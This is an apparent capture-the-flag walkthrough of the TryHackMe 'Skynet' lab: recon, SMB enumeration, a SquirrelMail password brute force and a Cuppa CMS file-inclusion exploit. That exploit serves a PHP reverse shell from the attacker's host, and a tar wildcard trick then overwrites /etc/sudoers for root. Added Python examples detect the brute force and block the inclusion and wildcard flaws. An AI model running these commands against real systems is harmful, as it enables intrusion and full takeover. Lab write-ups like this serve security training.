# Skynet

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbS_KaXGGFniW_7DE_B%2F-MbS_NjTcksIVBd-Mjdd%2Fimage.png?alt=media\&token=700d00ca-5342-4048-a7a1-34ac8064e9bc)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```
nmap -Pn 10.10.149.41
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSa5vhqzlOe8mwEk4_%2F-MbSaFdg_MugJFSQOCSh%2Fimage.png?alt=media\&token=777bcf2e-1cf0-4d4e-a554-53e2d48abd53)

Detailed nmap scan:

Command breakdown:

* **-sV**: Service version detection
* **-sC**: Default nmap scripts
* **-p**: Scan only the specified ports, 22,80,110,139,143,445
* **-oN nmap**: Save the output (normal format) to a file called `nmap`

```
nmap -sV -sC -p 22,80,110,139,143,445 -oN nmap 10.10.149.41
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaJffmItblHMRjhBX%2F-MbSajPiV1-wQ-Wrfx6L%2Fimage.png?alt=media\&token=de4cf05a-1e4a-4ba2-9b14-57af13b63791)

## Enumeration

### Port 80: HTTP

Let's visit the website.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSce0Q_8uYPdUQh1gu%2Fimage.png?alt=media\&token=7eea4c45-4458-4d60-b87e-dabffb292d44)

It is a search engine, but searching for something returns nothing and none of the buttons work. The source code has nothing interesting either.

Let's run a gobuster scan to find hidden directories and files.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSdaFY7WL0F-y4wvId%2Fimage.png?alt=media\&token=119e54b6-d3a0-47c5-a11b-e879530049cd)

Looks like we found some directories, but we are not allowed to access any of them.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSdjP1D3fi-xwUsdSZ%2Fimage.png?alt=media\&token=f2295000-1625-4cf5-a4ae-0ab3df14153a)

After a while we get another hit.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeCSzYPBJf61DU9FW%2Fimage.png?alt=media\&token=b9498741-68f2-4de8-a9c3-9788c1dee7f7)

The directory is called `/squirrelmail`; let's visit it and see if we have access to it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeMpAaVrHqni7SlPK%2Fimage.png?alt=media\&token=6d322f40-1888-4ef8-b913-4bcd56e62f87)

And we do. It's a login form, so we need to find a username and a password.

### Port 139,445: SMB

Let's use `enum4linux`, a tool that enumerates Samba services on a machine.

```
enum4linux -a 10.10.149.41
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeoa229YzUDMppAV2%2Fimage.png?alt=media\&token=219b8277-eeb1-4767-b796-6838646098be)

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSaky-nllVTJNd6tTO%2F-MbSeth5PWQ0Y_NIqAEK%2Fimage.png?alt=media\&token=fc9bba8a-097e-4f0e-a4d1-9cf973aa1c1c)

Looking at the Share Enumeration section of the output, the share names `print$` and `IPC$` are standard, but `anonymous` and `milesdyson` are not, and `milesdyson` looks like a username, so let's add that to our notes.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSezOWbOJnbNXzJs1T%2F-MbSfdSHCeLLEvOPCOu7%2Fimage.png?alt=media\&token=8b5391f5-3cbb-4827-908a-b7312304e708)

Now let's try to access those shares using `smbclient`.

```
smbclient //10.10.149.41/anonymous
```

After pressing enter at the password prompt (no password):

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSgVX0s_KiJRAmMEK4%2Fimage.png?alt=media\&token=7a73fedf-05a0-4066-a78f-2766bb71bc08)

We are logged in. Let's now explore.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSgom9vC_RENNfIhvv%2Fimage.png?alt=media\&token=b0c88dc2-52a2-4caf-aec0-45fac311efe2)

There is a directory and a file; let's transfer the file, and the files in the directory, to our machine.

```
get <file-name>
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSh6yepNy39zwO4iSE%2Fimage.png?alt=media\&token=695fb0e2-3363-4ed6-b581-3035536d6b00)

I am only transferring the `log1.txt` file because the other files are empty, as shown in the `ls` output.

Let's now read the files that we transferred to our machine.

```
cat <file-name>
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbShUpF4KWAsW08IsLs%2Fimage.png?alt=media\&token=413655ba-24d7-4c1d-a37b-24415ae000a7)

The `attention.txt` file tells us that all employee passwords have been changed and that everyone is required to change their password. The second file looks like a password list, and since it is named log, it might contain older passwords; we can also theorize that someone might not have changed their password, for example the person who wrote the attention note, Miles Dyson. We can try to brute force the SquirrelMail service we found on the web server with the username `milesdyson` and the password list we just saw.

Now I wanted to try using `hydra` or Burp Suite to do this, but I was looking at the [walkthrough](https://www.youtube.com/watch?v=HXikLrFVIXc) by John Hammond, and the Python script that he made was very interesting and valuable, so I made one and used that to find the correct password. Let's go through the steps he did.

Let's first open the developer tools (`Ctrl + Shift + i`) and then submit the login form with a random username and password. In the Network tab of the developer tools, we see a request to `redirect.php` when we hit login; let's look into that request.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSkyq0OxA57dlDcoUp%2Fimage.png?alt=media\&token=268508c1-0dd5-4c56-bc04-61566f30bf29)

Now let's copy the request: right-click on the file name, go to Copy and then click Copy as cURL. We can now go to a cURL-to-Python requests code [converter](https://curl.trillworks.com/), paste the command there, and copy the resulting Python code to a file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSlhH7amI-yFv3_msF%2Fimage.png?alt=media\&token=dfb14736-db11-440f-b0f4-54aef9487a9b)

I'm going to create the file `bruteforce.py`; once you do that, we need to modify the code a bit to make it brute force the service with the username and password list we provide.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSm16EvJiHv2grwxpS%2Fimage.png?alt=media\&token=e8c416f9-ddcc-45b6-90d5-b837b3db163e)

This is how the code looks before any modifications:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSnfI3_vNFWB_LVh12%2Fimage.png?alt=media\&token=72964771-aa5f-408e-9b39-6536d2288760)

And this is the code after modifications. I can try to explain what this code does, but I think John Hammond does a better job at that, so go watch the [video](https://www.youtube.com/watch?v=HXikLrFVIXc) he made if you want to understand the code.

Now if we save and run the code, we find the password.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSo7D_IiIyD4JEIfmJ%2Fimage.png?alt=media\&token=b1934286-27b7-4fba-b37a-a0f990f3ee4e)

The password is `cyborg007haloterminator`, which is also the answer to the first question in this room.
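From the defender's side, every guess the script above makes is one POST to `/squirrelmail/src/redirect.php`, which is easy to spot in the web server's access log. The following is an added example (my own code, not the write-up's `bruteforce.py` or John Hammond's script) that flags IPs making a burst of POSTs to that path; the Apache-style log lines are constructed for the demo and `10.10.10.5` is an assumed benign client.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

LOGIN_PATH = "/squirrelmail/src/redirect.php"  # login handler seen in the Network tab

# Apache combined log fields we need: client IP, timestamp, method and path.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)'
)


def parse_line(line):
    """Return (ip, datetime, method, path-without-query) or None if unparsable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("method"), m.group("path").split("?")[0]


def find_login_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {ip: total POSTs} for every IP that POSTs to LOGIN_PATH at least
    `threshold` times inside any sliding `window` (the guessing pattern)."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == LOGIN_PATH:
            posts[rec[0]].append(rec[1])
    flagged = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1          # slide the window forward
            if end - start + 1 >= threshold:
                flagged[ip] = len(times)
                break
    return flagged


def sample_log():
    """Constructed sample: 12 guesses in 12 seconds from 10.13.8.64 (the attacker
    IP used in this write-up) and one ordinary login from an assumed client."""
    base = datetime(2021, 6, 10, 12, 0, 0, tzinfo=timezone.utc)
    fmt = "%d/%b/%Y:%H:%M:%S %z"
    lines = []
    for i in range(12):
        ts = (base + timedelta(seconds=i)).strftime(fmt)
        lines.append(f'10.13.8.64 - - [{ts}] "POST {LOGIN_PATH} HTTP/1.1" 302 -')
    ts = base.strftime(fmt)
    lines.append(f'10.10.10.5 - - [{ts}] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2048')
    lines.append(f'10.10.10.5 - - [{ts}] "POST {LOGIN_PATH} HTTP/1.1" 302 -')
    return lines


if __name__ == "__main__":
    print(find_login_bursts(sample_log()))  # {'10.13.8.64': 12}
```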

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSfgWWgTlw20UelhGF%2F-MbSoGz_ayxmMu0ATO8A%2Fimage.png?alt=media\&token=66c7d444-10f2-4f6d-9eea-b065ff073ae5)

### Port 80: HTTP

We can now log in to SquirrelMail.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSoIPo6VFoUmznAlWI%2F-MbSohx7SqMhZnbIfETF%2Fimage.png?alt=media\&token=dff3455f-3b98-4de9-babb-a96c6202097a)

There are three emails that Miles Dyson received; the ones with (no subject) have nothing of interest, but the Samba password reset email has something really interesting.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSpCrmufw6jassW8vl%2Fimage.png?alt=media\&token=1819d38f-f584-427b-bd39-5d8923b05645)

We now have Miles Dyson's SMB password, which is `)s{A&2Z=F^n_E.B'`.

### Port 139,445: SMB

Now that we have the password for Miles Dyson's SMB share, we can log in using `smbclient`.

```
smbclient -U milesdyson //10.10.149.41/milesdyson
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSqcRe0X8fSGqlWCE2%2Fimage.png?alt=media\&token=adc7e30c-23ac-4c12-afe3-9bf21c193f8c)

We are now logged in. Let's list the files and directories on the share.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSr3pAeu_GedhmnGVO%2Fimage.png?alt=media\&token=92e86247-2fe9-49a8-b9b8-aa50801cb0cb)

Looking through the files, only one file in the notes directory looks interesting, so let's transfer it to our machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSrEkpNTRGEFgJapzZ%2Fimage.png?alt=media\&token=72766c0d-bd5f-4984-921e-2c7aafbcfec8)

Now let's read the `important.txt` file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSokPpq4hHbTBO-ZTH%2F-MbSrO7vmJ8fpBDdeCF5%2Fimage.png?alt=media\&token=0fdd0453-3d4c-43fc-b09c-979bb977d622)

Looks like the first line gives us a directory that we can visit on the web server, so let's do that.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSrPNJDSneveitSbr1%2F-MbSrfxDOsQc2qRveIgI%2Fimage.png?alt=media\&token=3ecb89b8-06c5-41fe-8bac-3dcd8c79bc1d)

Nothing of interest here, nor in the source code, so let's run `gobuster` to find hidden directories and files. Also, the directory we just found is the answer to the second question in this room.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSrPNJDSneveitSbr1%2F-MbSs0dGlpEaS7LqsUEw%2Fimage.png?alt=media\&token=2553c057-f486-4f9b-8110-fbf9a91141c9)

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.149.41/45kra24zxs28v3yd/
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSsX3uDRLZ1nZ7ABvB%2Fimage.png?alt=media\&token=c5127fe8-0003-47fd-836f-e3adcb8f6b7f)

We find an administrator page; let's visit it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSsh14jeOvjWRmN7U9%2Fimage.png?alt=media\&token=72ef89a4-b261-4a29-88ac-8f5bbf6a7a0b)

It's a login page. If we try the credentials we found earlier, they do not work. The page shows the service name, `Cuppa CMS`, so let's go to searchsploit and check whether there are any exploits for this service.

```
searchsploit Cuppa
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbStI82K7zIxw3Z_PJ8%2Fimage.png?alt=media\&token=45b58381-ae6a-42f5-aacd-0742eaf34895)

And there is, so let's copy the exploit to our working directory.

```
searchsploit -m php/webapps/25971.txt
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbStWOXSYnAL31Gj6Dx%2Fimage.png?alt=media\&token=a8bf43c3-dc40-4d46-bafa-2d93372649a0)

We can now answer the third question in this room.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbStgO-AAzWElHzs0eF%2Fimage.png?alt=media\&token=8fc04f2b-ef17-4f8b-9685-b5a3742c8dbe)

## Exploitation

Reading through the exploit text, it looks like we can read the `/etc/passwd` file, so let's try that.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSutuGTV104jNNjW7L%2Fimage.png?alt=media\&token=955a6f23-48b5-4f19-accc-ba80c833042c)

We need to replace the target and alerts placeholders as well:

```
curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSvT76XN0qOiHlrZsZ%2Fimage.png?alt=media\&token=e2862ec4-0456-42ca-a916-7571dbc6ea4b)

Looks like it works. The exploit text also mentions that we can run PHP files on the server through this vulnerability, so what if we write a command in a PHP file and serve it from an HTTP server on our machine? We can do this because the same parameter is also a remote file inclusion vulnerability on the web server.

So first let's make the file with the command; let's call it `command.php`.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSw_oWMT53YXGwpx7w%2Fimage.png?alt=media\&token=b3176483-b74b-4867-95ca-4c6a25adc3c7)

Let's see if the command `whoami` works.

Now we have to start an HTTP server so that the victim machine can connect back to us.

```
python -m http.server 8080
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSxc9Kg1rv9KbFYszn%2Fimage.png?alt=media\&token=3d28c862-c5e9-4263-acfe-a0150d14be0c)

Now we run the curl command so that the target connects to our machine and includes the `command.php` file.

```
curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/command.php
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbSxkw-dS63sR1D6RTj%2Fimage.png?alt=media\&token=79eff073-7056-43c9-b510-75ca1c946768)

And it works, as we get the right output. Now what if we change `command.php` to a PHP reverse shell file to get a reverse shell on the machine? We can find a PHP reverse shell file [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php).
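Both requests above work because the `urlConfig` value is passed to an include without validation. To show what a safe resolver does with the same two payloads, here is an added example in Python (not Cuppa CMS code and not part of the original write-up): it refuses any URL scheme, absolute path or traversal outside the alerts directory and accepts only a plain file name that resolves inside it. The scratch directory and the config file it creates are constructed placeholders.

```python
import os
import re
import tempfile

# Anything with a scheme (http://, ftp://, php://, data:, ...) could make
# PHP's include() fetch or wrap remote content; refuse it outright.
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")


def resolve_include(base_dir, url_config):
    """Return the absolute file to include, or None if the value is unsafe.
    Mirrors what alertConfigField.php should have done with its urlConfig
    parameter: only a relative name that stays inside base_dir is accepted."""
    if not url_config or "\x00" in url_config:
        return None
    if SCHEME_RE.match(url_config) or os.path.isabs(url_config):
        return None                      # http://10.13.8.64:8080/command.php, /etc/passwd
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, url_config))
    if os.path.commonpath([base, target]) != base:
        return None                      # ../../../../etc/passwd escapes base_dir
    if not os.path.isfile(target):
        return None
    return target


def demo():
    """Constructed layout: an alerts directory holding one legitimate config.
    Returns which of the page's payloads (plus a legitimate name) are accepted."""
    alerts_dir = tempfile.mkdtemp()
    with open(os.path.join(alerts_dir, "alertConfig.php"), "w") as f:
        f.write("<?php // constructed placeholder config ?>\n")
    payloads = {
        "legit": "alertConfig.php",
        "traversal": "../../../../../../../../../etc/passwd",
        "remote": "http://10.13.8.64:8080/command.php",
        "absolute": "/etc/passwd",
    }
    return {name: resolve_include(alerts_dir, value) is not None
            for name, value in payloads.items()}


if __name__ == "__main__":
    print(demo())  # {'legit': True, 'traversal': False, 'remote': False, 'absolute': False}
```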

Once you copy the file and change the IP to your TryHackMe IP as mentioned in the file, copy it to the directory where you will start the HTTP server. Then change the file name in the curl URL and also start a Netcat listener on the IP and port set in the PHP reverse shell file.

```
nc -lvnp 1234
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT-v1lGHx5C-whvA56%2Fimage.png?alt=media\&token=989985fa-88bc-4908-9c38-c4375ae30eec)

Once you have done that, run the curl command. Also make sure you started the Python HTTP server.

```
curl http://10.10.149.41/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.13.8.64:8080/shell.php
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT06ALmWn32JZkUrPQ%2Fimage.png?alt=media\&token=ad5ebf01-89f8-435b-8b2e-1aa141781e35)

After you hit enter, you should get a reverse shell on the machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT0F3YzqNOrWOddNSa%2Fimage.png?alt=media\&token=f949fdea-9547-43be-a1fa-156b7013e701)

You can now read `user.txt`, which is the answer to the fourth question of this room.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT0TPbxqct1JH66-m5%2Fimage.png?alt=media\&token=a9602df8-3eac-42bf-80bc-32c79933b8d4)

And you can use these commands to stabilize your shell:

```bash
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-color
# press Ctrl + Z to background the shell, then in your local terminal:
stty raw -echo; fg
reset
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT0q6g_rYq0OSP9UYj%2Fimage.png?alt=media\&token=7ae2ff2c-c249-42ff-ba98-f414668f3168)

Looking at the files and directories, a particular directory and file look interesting: `/backups` and `backup.sh`.

Let's read the file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT1uAW7oUaeYg5Wqgi%2Fimage.png?alt=media\&token=52884de7-2cd9-4e5c-a2df-e0b12b2ac1b1)

It looks like it changes directory into `/var/www/html` and then runs a tar command using the other file in the `/backups` directory. Looking at the tar command and the `*` symbol, I was thinking that there should be an [exploit](https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/) based on this, so I went to Google, searched for it and found it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT2rHeozDQy-WYu7Yr%2Fimage.png?alt=media\&token=386b9402-5ed0-48bc-87da-81bf2a739564)

The part that we are interested in is this:

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbSs6lIIpagz6_6BtSw%2F-MbT3VmtJ5m4LjJJI3F1%2Fimage.png?alt=media\&token=dae92ff0-d7ee-45cd-aa39-26a9d33537a5)

I can try to explain what these commands do, but not as well as John Hammond, so make sure to go [there](https://www.youtube.com/watch?v=HXikLrFVIXc) and look at what the commands do and mean.

The commands that we will use are (also make sure to cd to `/var/www/html` before running them):

```bash
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html"  > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html"  > --checkpoint=1
```

Wait for a while and then run the `sudo -l` command.
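The root cause is that the shell expands a bare `*` in the web root into tar's argument list, so file names such as `--checkpoint=1` become tar options. Here is an added example (my own code, not from the write-up) that audits a backup script for that pattern and demonstrates why `./*`, or a `--` before the operand, closes the hole: names no longer start with `-`, or tar stops parsing options. The two scripts are constructed, modelled on the `backup.sh` described above.

```python
import glob
import os
import tempfile

# Constructed scripts modelled on the backup.sh described in the write-up.
VULNERABLE_SCRIPT = """#!/bin/bash
cd /var/www/html
tar cf /backups/backup.tgz *
"""
HARDENED_SCRIPT = """#!/bin/bash
cd /var/www/html
tar cf /backups/backup.tgz -- ./*
"""


def audit_tar_wildcard(script_text):
    """Return line numbers where tar gets a bare glob operand (a token that
    starts with '*') that is not shielded by a preceding '--'."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        tokens = line.split()
        if "tar" not in tokens:
            continue
        args = tokens[tokens.index("tar") + 1:]
        if "--" in args:
            args = args[:args.index("--")]   # tokens after '--' are never options
        if any(t.startswith("*") for t in args):
            findings.append(lineno)
    return findings


def expand_globs(dir_path):
    """Expand '*' and './*' inside dir_path the way the shell would and
    return both sorted name lists."""
    cwd = os.getcwd()
    os.chdir(dir_path)
    try:
        return sorted(glob.glob("*")), sorted(glob.glob("./*"))
    finally:
        os.chdir(cwd)


def demo():
    """Scratch web root holding the two option-looking file names from the
    privesc above; report which expansion hands them to tar as options."""
    root = tempfile.mkdtemp()
    for name in ("index.php", "--checkpoint=1",
                 "--checkpoint-action=exec=sh privesc.sh"):
        open(os.path.join(root, name), "w").close()
    bare, prefixed = expand_globs(root)
    return {"bare": [n for n in bare if n.startswith("-")],
            "prefixed": [n for n in prefixed if n.startswith("-")]}


if __name__ == "__main__":
    print(audit_tar_wildcard(VULNERABLE_SCRIPT), audit_tar_wildcard(HARDENED_SCRIPT))  # [3] []
    print(demo())  # {'bare': ['--checkpoint-action=exec=sh privesc.sh', '--checkpoint=1'], 'prefixed': []}
```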

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbT5mRTCZdC4DnHwVpm%2F-MbT5ygLtgiG0dDCeusV%2Fimage.png?alt=media\&token=3c13e383-6b97-46d5-bc1a-b2a719acb981)

Now we can run all commands as root, so let's switch user to root.

```bash
sudo su root
```

You can also read the root flag, which is the answer to the last question of the room.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MbT5mRTCZdC4DnHwVpm%2F-MbT6Cun1sp6miv5pGnF%2Fimage.png?alt=media\&token=2315f703-6b37-4503-9fe2-d0daa623bfcf)
